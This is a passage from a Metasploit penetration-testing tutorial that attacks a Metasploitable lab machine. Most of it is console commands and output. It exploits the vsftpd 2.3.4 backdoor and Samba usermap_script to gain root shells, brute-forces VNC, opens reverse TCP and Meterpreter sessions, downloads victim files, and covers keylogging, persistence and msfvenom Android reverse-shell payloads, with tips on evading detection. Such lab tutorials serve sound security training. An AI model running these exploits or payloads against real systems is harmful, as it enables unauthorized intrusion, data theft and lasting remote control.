   -  ‐‐‐‐                                         ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐       ‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   0  post/windows/manage/forward_pageant                           normal     No     Forward SSH Agent Requests To Remote Pageant
   1  post/windows/manage/install_ssh                               normal     No     Install OpenSSH for Windows
   2  post/multi/gather/ssh_creds                                   normal     No     Multi Gather OpenSSH PKI Credentials Collection
   3  auxiliary/scanner/ssh/ssh_enumusers                           normal     No     SSH Username Enumeration
   4  exploit/windows/local/unquoted_service_path  2001-10-25       excellent  Yes    Windows Unquoted Service Path Privilege Escalation


Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/local/unquoted_service_path

However, this result is not so much promising. Still, we probably can brute force the system to get the login credentials. Let’s find out some more vulnerabilities before we start exploiting them. The ftp application ProFTPD 1.3.1 looks promising. Let’s search if anything is in the Metasploit database:

search proftpd

Matching Modules
================

   #  Name                                         Disclosure Date  Rank       Check  Description
   -  ‐‐‐‐                                         ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐       ‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   0  exploit/linux/misc/netsupport_manager_agent  2011-01-08       average    No     NetSupport Manager Agent Remote Buffer Overflow
   1  exploit/linux/ftp/proftp_sreplace            2006-11-26       great      Yes    ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
   2  exploit/freebsd/ftp/proftp_telnet_iac        2010-11-01       great      Yes    ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
   3  exploit/linux/ftp/proftp_telnet_iac          2010-11-01       great      Yes    ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
   4  exploit/unix/ftp/proftpd_modcopy_exec        2015-04-22       excellent  Yes    ProFTPD 1.3.5 Mod_Copy Command Execution
   5  exploit/unix/ftp/proftpd_133c_backdoor       2010-12-02       excellent  No     ProFTPD-1.3.3c Backdoor Command Execution


Interact with a module by name or index. For example info 5, use 5 or use exploit/unix/ftp/proftpd_133c_backdoor

Seems like there is no specific mention of version 1.3.1 for the ProFTPD application. However, the other versions might still work. We’ll find that out very soon.

You can research each of the open port applications and find out what vulnerabilities might be associated with them. You can definitely use google and other exploit databases as well instead of only Metasploit.

Exploiting Vulnerabilities

This is the most anticipated step of the penetration test. In this step, we’ll exploit the victim machine in all its glory. Let’s begin with the most straightforward vulnerability to exploit that we found in the previous step. It is the VSFTPD 2.3.4 backdoor command execution exploit.

Exploiting the VSFTPD vulnerability

Let’s use the exploit (exploit/unix/ftp/vsftpd_234_backdoor):

use exploit/unix/ftp/vsftpd_234_backdoor

[*] No payload configured, defaulting to cmd/unix/interact

After entering this command, you’ll see your command line will look like this:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > 

This means you are using this exploit now. Let’s see the options for the exploit:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ‐‐‐‐    ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   21               yes       The target port (TCP)


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐


Exploit target:

   Id  Name
   ‐‐  ‐‐‐‐
   0   Automatic

Let’s set up the RHOSTS as the target machine’s IP address (192.168.74.129 in my case):

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.74.129
RHOSTS => 192.168.74.129 

See the options again:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ‐‐‐‐    ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   RHOSTS  192.168.74.129   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   21               yes       The target port (TCP)


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐


Exploit target:

   Id  Name
   ‐‐  ‐‐‐‐
   0   Automatic

Now you have to specify a payload as well. Let’s see what are our options:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads

Compatible Payloads
===================

   #  Name                       Disclosure Date  Rank    Check  Description
   -  ‐‐‐‐                       ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐    ‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   0  payload/cmd/unix/interact                   normal  No     Unix Command, Interact with Established Connection

Not much of an option right? And this one is already set up in the options. You can check it yourself. There are no required values for this payload as well. Let’s check if this exploit will work or not –
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > check
 [-] Check failed: NoMethodError This module does not support check.

So, this exploit doesn’t support checking. Let’s move forward. This is the moment of truth. Let’s exploit the machine –
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 192.168.74.129:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.74.129:21 - USER: 331 Please specify the password.
[+] 192.168.74.129:21 - Backdoor service has been spawned, handling...
[+] 192.168.74.129:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 2 opened (0.0.0.0:0 -> 192.168.74.129:6200) at 2022-02-07 05:14:38 -0400


whoami
root

Voila! We’ve successfully exploited the machine. We got the shell access. I ran the whoami command and got the reply as root. So, we have full access to the Metasploitable machine. We can do whatever the root can – everything!

Now before we show what to do after exploitation, let’s see some other methods of exploitation as well.

Keeping the sessions in the background

First, let’s keep the session we got in the background:

Type in background within the terminal, then type y and hit enter:

whoami
root
background

Background session 2? [y/N]   y
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > 

You can access this session anytime using the sessions command:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > sessions

Active sessions
===============

  Id  Name  Type            Information  Connection
  ‐‐  ‐‐‐‐  ‐‐‐‐            ‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐
  2         shell cmd/unix               0.0.0.0:0 -> 192.168.74.129:6200 (192.168.74.129)

You can get back to the session by using the “-i” flag and specifying the ID. Do the following –

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > sessions -i 2
[*] Starting interaction with 2...

whoami
root

Exploiting samba smb

Did you notice that the netbios-ssn service was running on Samba in our victim machine’s port 139 and 445? There might be an exploit that we could use. But before that, there was no particular version written for the samba application. However, we have an auxiliary module in Metasploit that can find out the version for us. Let’s see this in action:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > search smb_version

Matching Modules
================

   #  Name                               Disclosure Date  Rank    Check  Description
   ‐  ‐‐‐‐                               ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐    ‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   0  auxiliary/scanner/smb/smb_version                   normal  No     SMB Version Detection


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/smb/smb_version

Now choose the smb scanner:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > use 0
msf6 auxiliary(scanner/smb/smb_version) > 

Now let’s see the options we have to set up:

msf6 auxiliary(scanner/smb/smb_version) > show options

msf6 auxiliary(scanner/smb/smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

   Name     Current Setting  Required  Description
   ‐‐‐‐     ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   THREADS  1                yes       The number of concurrent threads (max one per host)

We can set up the RHOSTS and THREADS here. The RHOSTS will be our target and the THREADS determine how fast will the program run. Let’s set them up:

msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.74.129
RHOSTS => 192.168.74.129
msf6 auxiliary(scanner/smb/smb_version) > set THREADS 16
THREADS => 16
msf6 auxiliary(scanner/smb/smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

   Name     Current Setting  Required  Description
   ‐‐‐‐     ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   RHOSTS   192.168.74.129   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   THREADS  16               yes       The number of concurrent threads (max one per host)

Now run it:

msf6 auxiliary(scanner/smb/smb_version) > run

[*] 192.168.74.129:445    - SMB Detected (versions:1) (preferred dialect:) (signatures:optional)
[*] 192.168.74.129:445    -   Host could not be identified: Unix (Samba 3.0.20-Debian)
[*] 192.168.74.129:       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The output gives us the version of the Samba – 3.0.20. Now we can find out the vulnerabilities associated with it. Let’s try google. A simple google search reveals this version is vulnerable to username map script command execution.

This is also available in Metasploit. Let’s perform a search:

msf6 auxiliary(scanner/smb/smb_version) > search username map script

Matching Modules
================

   #  Name                                   Disclosure Date  Rank       Check  Description
   -  ‐‐‐‐                                   ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐       ‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   0  auxiliary/scanner/oracle/oracle_login                   normal     No     Oracle RDBMS Login Utility
   1  exploit/multi/samba/usermap_script     2007-05-14       excellent  No     Samba "username map script" Command Execution


Interact with a module by name or index. For example info 1, use 1 or use exploit/multi/samba/usermap_script

As you can see, there is an exploit for this vulnerability with an excellent rank. Let’s use this one and try to gain access to the metasploitable machine:

msf6 auxiliary(scanner/smb/smb_version) > use 1
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ‐‐‐‐    ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   139              yes       The target port (TCP)


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ‐‐‐‐   ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   LHOST  192.168.74.128   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   ‐‐  ‐‐‐‐
   0   Automatic

We can see that the Payload options are already set up. I will not change it. You can change the LHOST to your attack machine’s IP address. We only need to set up the RHOSTS option:

msf6 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.74.129
RHOSTS => 192.168.74.129

Now let’s exploit:

msf6 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP handler on 192.168.74.128:4444 
[*] Command shell session 3 opened (192.168.74.128:4444 -> 192.168.74.129:45078) at 2021-06-29 06:48:33 -0400

whoami
root

As you can see the exploit sets up a reverse TCP handler to accept the incoming connection from the Victim machine. Then the exploit completes and opens a session. We can also see that the access level is root. Now let’s move on to another exploit keeping this session in the background.

Exploiting VNC

Now let’s try to exploit the VNC service running on our victim machine. If you search in Metasploit database, you will find no matching exploit for this one. This means you have to think of some other ways to get into this service. Let’s try to brute force the VNC login. We’ll be using the auxiliary scanner for vnc login:

msf6 exploit(multi/samba/usermap_script) > search scanner vnc

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ‐‐‐‐                                      ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐    ‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   0  auxiliary/scanner/vnc/ard_root_pw                          normal  No     Apple Remote Desktop Root Vulnerability
   1  auxiliary/scanner/http/thinvnc_traversal  2019-10-16       normal  No     ThinVNC Directory Traversal
   2  auxiliary/scanner/vnc/vnc_none_auth                        normal  No     VNC Authentication None Detection
   3  auxiliary/scanner/vnc/vnc_login                            normal  No     VNC Authentication Scanner


Interact with a module by name or index. For example info 3, use 3 or use auxiliary/scanner/vnc/vnc_login

We’ll be needing the VNC Authentication Scanner (3). Let’s select it:

msf6 exploit(multi/samba/usermap_script) > use 3
msf6 auxiliary(scanner/vnc/vnc_login) > 

We do not know what this auxiliary module does yet. Let’s find out. Remember the info command?

msf6 auxiliary(scanner/vnc/vnc_login) > info

       Name: VNC Authentication Scanner
     Module: auxiliary/scanner/vnc/vnc_login
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  carstein <carstein.sec@gmail.com>
  jduck <jduck@metasploit.com>

Check supported:
  No

Basic options:
  Name              Current Setting                                                   Required  Description
  ‐‐‐‐              ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐                                                   ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
  BLANK_PASSWORDS   false                                                             no        Try blank passwords for all users
  BRUTEFORCE_SPEED  5                                                                 yes       How fast to bruteforce, from 0 to 5
  DB_ALL_CREDS      false                                                             no        Try each user/password couple stored in the current database
  DB_ALL_PASS       false                                                             no        Add all passwords in the current database to the list
  DB_ALL_USERS      false                                                             no        Add all users in the current database to the list
  PASSWORD                                                                            no        The password to test
  PASS_FILE         /usr/share/metasploit-framework/data/wordlists/vnc_passwords.txt  no        File containing passwords, one per line
  Proxies                                                                             no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                                                                              yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT             5900                                                              yes       The target port (TCP)
  STOP_ON_SUCCESS   false                                                             yes       Stop guessing when a credential works for a host
  THREADS           1                                                                 yes       The number of concurrent threads (max one per host)
  USERNAME          <BLANK>                                                           no        A specific username to authenticate as
  USERPASS_FILE                                                                       no        File containing users and passwords separated by space, one pair per line
  USER_AS_PASS      false                                                             no        Try the username as the password for all users
  USER_FILE                                                                           no        File containing usernames, one per line
  VERBOSE           true                                                              yes       Whether to print output for all attempts 
Description:
  This module will test a VNC server on a range of machines and report 
  successful logins. Currently it supports RFB protocol version 3.3, 
  3.7, 3.8 and 4.001 using the VNC challenge response authentication 
  method.

References:
  https://nvd.nist.gov/vuln/detail/CVE-1999-0506

We can see the options this module will take. The description is also there. From the description, it becomes clear that this is a module that will try brute-forcing. Another conspicuous fact is that this module supports RFB protocol version 3.3, which is written in our discovered VNC service (protocol 3.3). If you’re wondering why this is related – VNC service uses RFB protocol. So this module is compatible with the VNC service in our victim machine. Let’s move forward with this.

We’ve already seen the options this module will take from the “info” command. The options marked in yellow are the important ones. Not all of them are required though. We can see the default password file (PASS_FILE) for the brute force will be (/usr/share/Metasploit-framework/data/wordlists/vnc_passwords.txt). We’ll not be changing this file. You might want to change this one if you’re doing real world tests that are not Metasploitable. We have to define RHOSTS. Let’s turn on STOP_ON_SUCCESS as well, which will stop the attack once the correct credentials are found. We’ll also increase the THREADS for faster operation, and set USER_AS_PASS to true, which will use the same username and password as well. Let’s set these up:

msf6 auxiliary(scanner/vnc/vnc_login) > set RHOSTS 192.168.74.129
RHOSTS => 192.168.74.129
msf6 auxiliary(scanner/vnc/vnc_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf6 auxiliary(scanner/vnc/vnc_login) > set THREADS 32
THREADS => 32
msf6 auxiliary(scanner/vnc/vnc_login) > set USER_AS_PASS true
USER_AS_PASS => true

Now you can start running the brute force:

msf6 auxiliary(scanner/vnc/vnc_login) > run

[*] 192.168.74.129:5900   - 192.168.74.129:5900 - Starting VNC login sweep
[!] 192.168.74.129:5900   - No active DB -- Credential data will not be saved!
[-] 192.168.74.129:5900   - 192.168.74.129:5900 - LOGIN FAILED: :<BLANK> (Incorrect: Authentication failed)
[+] 192.168.74.129:5900   - 192.168.74.129:5900 - Login Successful: :password

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The brute force attempt was successful. We can see the username:password pair as well. There is no username set up here, and the password is just password. In real systems, most of the time the password will not be this simple. However, now you know how you can brute force the VNC authentication.

Now let’s try to login to the VNC with our cracked credentials. I’ll use the vncviewer command followed by the IP address of the victim machine:

msf6 auxiliary(scanner/vnc/vnc_login) > vncviewer 192.168.74.129
[*] exec: vncviewer 192.168.74.129

Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password:

At this point, you’ll have to provide the password. Type in password and you’ll get in:

msf6 auxiliary(scanner/vnc/vnc_login) > vncviewer 192.168.74.129
[*] exec: vncviewer 192.168.74.129

Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password: 
Authentication successful
Desktop name "root's X desktop (metasploitable:0)"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0

Do you want to see the GUI version of the Metasploitable that we cracked just now? Here’s the view from the TightVNC application.

This is beautiful. Now you can pretty much do anything you desire. Now that we’ve shown you 3 ways you can exploit the Metasploitable with the Metasploit Framework, it’s time to show you the things you might have to do once you’ve gained access.

Post Exploitation tasks with Metasploit & Meterpreter

One of the tasks you might do after exploiting is keeping the session in the background while you work on the Metasploit Framework. We’ve already shown you how to do that in the previous section. However, if you exit from the session then that opened session will be gone.

You will need to exploit the machine once again to get another session. The same thing will happen if the victim chooses to reboot the machine. In this section, we’ll show you how to keep your access even if the victim reboots his/her machine.

One of the most useful tools after exploiting a target is the Meterpreter shell. It has many custom functionalities built into it that you don’t need to make a program or install any software to do.

What is Meterpreter?

Meterpreter is a Metasploit payload that gives an interactive shell that attackers may use and execute code on the victim system. It uses in-memory DLL injection to deploy. This allows Meterpreter to be fully deployed in the memory and it does not write anything to the disk. There are no new processes as Meterpreter gets injected into the affected process. It may also move to other operating processes. The forensic footprint of Meterpreter is therefore very small.

Upgrade to a meterpreter from shell

Meterpreter is an advanced payload for Metasploit that offers lots of functions after exploiting a system. But if you noticed, we didn’t get any meterpreter sessions from the exploits.

In fact, the exploits did not have an option to set meterpreter as a payload. Let’s learn how to upgrade to meterpreter from a shell. Let’s see the sessions we have at first using the sessions command:

msf6 auxiliary(scanner/vnc/vnc_login) > sessions

Active sessions
===============

  Id  Name  Type            Information  Connection
  ‐‐  ‐‐‐‐  ‐‐‐‐            ‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐
  2         shell cmd/unix               0.0.0.0:0 -> 192.168.74.129:6200 (192.168.74.129)
  4         shell cmd/unix               192.168.74.128:4444 -> 192.168.74.129:33209 (192.168.74.129)

As you can see, we have two sessions now with id 2 and 4. Both of these sessions are of unix cmd shell type. Now let’s try to upgrade to meterpreter. For this purpose, we’ll be using the shell to meterpreter exploit:

msf6 auxiliary(scanner/vnc/vnc_login) > search shell to meterpreter upgrade

Matching Modules
================

   #  Name                                          Disclosure Date  Rank       Check  Description
   ‐  ‐‐‐‐                                          ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐       ‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   0  post/multi/manage/shell_to_meterpreter                         normal     No     Shell to Meterpreter Upgrade
   1  exploit/windows/local/powershell_cmd_upgrade  1999-01-01       excellent  No     Windows Command Shell Upgrade (Powershell)


Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/local/powershell_cmd_upgrade

Let’s use the first one:

msf6 auxiliary(scanner/vnc/vnc_login) > use 0
msf6 post(multi/manage/shell_to_meterpreter) > show options

Module options (post/multi/manage/shell_to_meterpreter):

   Name     Current Setting  Required  Description
   ‐‐‐‐     ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   HANDLER  true             yes       Start an exploit/multi/handler to receive the connection
   LHOST                     no        IP of host that will receive the connection from the payload (Will try to auto detect).
   LPORT    4433             yes       Port for payload to connect to.
   SESSION                   yes       The session to run this module on.

Now we have to specify the options. Remember the IDs of the sessions? Let’s try to upgrade the session ID 4:

msf6 post(multi/manage/shell_to_meterpreter) > set SESSION 4
SESSION => 4

Now exploit:

msf6 post(multi/manage/shell_to_meterpreter) > exploit

[*] Upgrading session ID: 4
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.74.128:4433 
[*] Sending stage (984904 bytes) to 192.168.74.129
[*] Meterpreter session 6 opened (192.168.74.128:4433 -> 192.168.74.129:46735) at 2022-02-07 10:08:39 -0400
[*] Command stager progress: 100.00% (773/773 bytes)
[*] Post module execution completed

This exploit might not work properly the first time. Keep on trying again until it works. Now let’s look at the sessions again:

msf6 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

  Id  Name  Type                   Information                                                                       Connection
  --  ----  ----                   -----------                                                                       ----------
  2         shell cmd/unix                                                                                           0.0.0.0:0 -> 192.168.74.129:6200 (192.168.74.129)
  4         shell cmd/unix                                                                                           192.168.74.128:4444 -> 192.168.74.129:33209 (192.168.74.129)
  6         meterpreter x86/linux  root @ metasploitable (uid=0, gid=0, euid=0, egid=0) @ metasploitable.localdo...  192.168.74.128:4433 -> 192.168.74.129:46735 (192.168.74.129)

There is also another option to upgrade your shell session to meterpreter using the sessions command:

msf6 post(multi/manage/shell_to_meterpreter) > sessions -u 2

[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [2]

[*] Upgrading session ID: 2
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.74.128:4433 
[*] Sending stage (984904 bytes) to 192.168.74.129
[*] Meterpreter session 3 opened (192.168.74.128:4433 -> 192.168.74.129:46599) at 2021-06-29 10:55:16 -0400

This is a much easier way. You can kill any sessions with the “sessions” command using the “-k” flag followed by the session ID. You can interact with any of the sessions using the “-i” flag with the sessions command. Let’s open session 3 that we just got –

msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 3
[*] Starting interaction with 3...
meterpreter >

As you can see, now we’re in meterpreter. There’s a lot a meterpreter console can do. You can type help to get a list of commands meterpreter supports. Let’s find out some of the functionalities that meterpreter can do.

Meterpreter functionalities

Meterpreter gives you loads of options for you to explore. You can get the commands by typing in “help” in meterpreter console. You can navigate the victim machine using the basic navigational commands of Linux. You can also download or upload some files into the victim system. There is a search option to search the victim machine with your desired keywords:

You can search for a file with the search command with -f flag:

meterpreter > search -f license.txt
Found 8 results...
    /var/www/tikiwiki-old/license.txt (24381 bytes)
    /var/www/twiki/license.txt (19440 bytes)
    /var/www/tikiwiki/license.txt (24381 bytes)
    /home/msfadmin/vulnerable/twiki20030201/twiki-source/license.txt (19440 bytes)
    /var/www/tikiwiki-old/lib/adodb/license.txt (26079 bytes)
    /var/www/tikiwiki-old/lib/htmlarea/license.txt (1545 bytes)
    /var/www/tikiwiki/lib/adodb/license.txt (26079 bytes)
    /var/www/tikiwiki/lib/htmlarea/license.txt (1545 bytes)

Downloding any file is super straightforward as well:

meterpreter > download /var/www/tikiwiki-old/license.txt
[*] Downloading: /var/www/tikiwiki-old/license.txt -> /root/license.txt
[*] Downloaded 23.81 KiB of 23.81 KiB (100.0%): /var/www/tikiwiki-old/license.txt -> /root/license.txt
[*] download   : /var/www/tikiwiki-old/license.txt -> /root/license.txt

You can enter the shell of the system anytime you like with the shell command:

meterpreter > shell
Process 5502 created.
Channel 2 created.
whoami

root
^C
Terminate channel 2? [y/N]  y

Furthermore, there are some networking commands such as – arp, ifconfig, netstat, etc.

You can list the process running in the victim machine with the ps command. There is an option to see the PID of the process that has hosted the meterpreter:

meterpreter > getpid
Current pid: 5390

In Windows systems, you may be able to migrate your meterpreter onto another process using the migrate command. You could also get keystrokes by using the keyscan_start and keyscan_dump depending on the system. On our victim machine, these commands are not supported:

meterpreter > keyscan_start
[-] The "keyscan_start" command is not supported by this Meterpreter type (x86/linux)

You can always find out the capabilities from the help command. Always keep in mind, as long as you have the command execution abilities, you can just upload a script to the victim machine that will do the job for you.

Staying persistently on the exploited machine

As we told you earlier, if the victim system reboots, you will lose your active sessions. You might need to exploit the system once again or start the whole procedure from the very beginning – which might not be possible. If your victim machine runs Windows, there is an option called persistence in Metasploit, which will keep your access persistent. To do it you’ll have to use:

meterpreter > run persistence

[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
[!] Example: run exploit/windows/local/persistence OPTION=value [...]
[-] x86/linux version of Meterpreter is not supported with this Script!

As you can see, this command does not work in our victim system. This is because it’s running on Linux. There is, however, an alternate option for keeping your access persistent on Linux machines as well.

For that purpose, you can use the crontab to do this. Cron is the task scheduler for Linux. If you’re not familiar with cron command in Linux, we suggest you follow an article that covers this topic in detail here.

Create custom payloads with msfvenom

msfvenom is a tool that comes with the Metasploit Framework.

With this tool, you can create custom payloads tailored to specific targets and requirements. Furthermore, you can attach payloads with other files that make your payload less suspicious. You can also edit the codes of your payloads and change them to evade detection by the threat detection systems. You can see all the options available for msfvenom by typing in msfvenom -h.

Check all options for creating your payload

To see all the options for creating the payload, you can list the modules by using the -l flag followed by the module type – which will be payload in our case.

msfvenom -l payloads

You’ll get a long list of payloads in the output. You can use grep command to narrow the result down to your liking. Let’s say I wanted to create payloads for Android. I’ll use the following to list the payloads:

msfvenom -l payloads | grep android

    android/meterpreter/reverse_http                    Run a meterpreter server in Android. Tunnel communication over HTTP
    android/meterpreter/reverse_https                   Run a meterpreter server in Android. Tunnel communication over HTTPS
    android/meterpreter/reverse_tcp                     Run a meterpreter server in Android. Connect back stager
    android/meterpreter_reverse_http                    Connect back to attacker and spawn a Meterpreter shell
    android/meterpreter_reverse_https                   Connect back to attacker and spawn a Meterpreter shell
    android/meterpreter_reverse_tcp                     Connect back to the attacker and spawn a Meterpreter shell
    android/shell/reverse_http                          Spawn a piped command shell (sh). Tunnel communication over HTTP
    android/shell/reverse_https                         Spawn a piped command shell (sh). Tunnel communication over HTTPS
    android/shell/reverse_tcp                           Spawn a piped command shell (sh). Connect back stager

Now, imagine I wanted to use the marked payload (android/meterpreter/reverse_tcp). I will need to know what options I have to set. To see the options for the payload, you’ll have to use the -p flag to specify the payload and the --list-options flag as below:

msfvenom -p android/meterpreter/reverse_tcp --list-options

Options for payload/android/meterpreter/reverse_tcp:
=========================


       Name: Android Meterpreter, Android Reverse TCP Stager
     Module: payload/android/meterpreter/reverse_tcp
   Platform: Android
       Arch: dalvik
Needs Admin: No
 Total size: 10175
       Rank: Normal

Provided by:
    mihi
    egypt <egypt@metasploit.com>
    OJ Reeves

Basic options:
Name   Current Setting  Required  Description
‐‐‐‐   ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
LHOST                   yes       The listen address (an interface may be specified)
LPORT  4444             yes       The listen port

Description:
  Run a meterpreter server in Android. Connect back stager



Advanced options for payload/android/meterpreter/reverse_tcp:
=========================

    Name                         Current Setting  Required  Description
    ----                         ---------------  --------  -----------
    AndroidHideAppIcon           false            no        Hide the application icon automatically after launch
    AndroidMeterpreterDebug      false            no        Run the payload in debug mode, with logging enabled
    AndroidWakelock              true             no        Acquire a wakelock before starting the payload
    AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
    AutoRunScript                                 no        A script to run automatically on session creation.
    AutoSystemInfo               true             yes       Automatically capture system information on initialization.
    AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
    AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
    EnableStageEncoding          false            no        Encode the second stage payload
    EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
    HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
    InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
    PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
    PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
    PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
    PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
    PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
    PingbackRetries              0                yes       How many additional successful pingbacks
    PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
    ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
    ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
    ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
    ReverseListenerComm                           no        The specific communication channel to use for this listener
    ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
    SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
    SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
    SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
    SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
    StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
    StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
    StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
